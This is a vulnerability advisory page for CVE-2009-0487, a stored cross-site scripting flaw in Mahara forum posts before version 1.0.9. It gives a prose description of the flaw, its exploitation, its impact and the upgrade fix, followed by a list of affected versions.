VYPR
← All advisories
Unrated severityNVD Advisory· Published Feb 9, 2009· Updated Apr 23, 2026

CVE-2009-0487

CVE-2009-0487

Description

Cross-site scripting (XSS) vulnerability in Mahara before 1.0.9 allows remote attackers to inject arbitrary web script or HTML via a crafted forum post.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Mahara before 1.0.9 fails to sanitize HTML in forum posts, allowing stored XSS.

Vulnerability

Mahara versions prior to 1.0.9 contain a stored cross-site scripting (XSS) vulnerability in forum posts. The application does not filter HTML or script content submitted via forum posts, allowing injection of arbitrary web script or HTML. The vulnerability affects all deployments using the forum feature before upgrading to version 1.0.9 [2].

Exploitation

A remote attacker can exploit this vulnerability by posting a crafted forum message containing malicious HTML or JavaScript. No authentication or special privileges are required beyond access to the forum feature; any user who can create or reply to a forum topic can inject the payload [1]. The malicious script triggers when other users (including administrators) view the affected post.

Impact

Successful exploitation leads to arbitrary script execution in the context of the victim's browser. This can result in information disclosure (e.g., session cookies, page content), session hijacking, or defacement of the site for other users. The impact is limited to the victim's session and does not directly compromise the server [2].

Mitigation

Upgrade to Mahara version 1.0.9 (released January 28, 2009) which applies HTMLPurifier to filter all forum posts before rendering [2]. No other workaround is documented in the available references. The vulnerable versions are all releases before 1.0.9.

References
  1. About Secunia Research | Flexera
  2. News - Mahara 1.0.9 Released - Mahara ePortfolio System

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

13
  • Mahara (software)/Mahara13 versions
    cpe:2.3:a:mahara:mahara:*:*:*:*:*:*:*:*+ 12 more
    • cpe:2.3:a:mahara:mahara:*:*:*:*:*:*:*:*range: <=1.0.8
    • cpe:2.3:a:mahara:mahara:0.9.0:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:0.9.1:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:0.9.2:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.0:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.1:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.2:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.3:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.4:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.5:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.6:*:*:*:*:*:*:*
    • cpe:2.3:a:mahara:mahara:1.0.7:*:*:*:*:*:*:*
    • (no CPE)range: <1.0.9

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

4

News mentions

0

No linked articles in our index yet.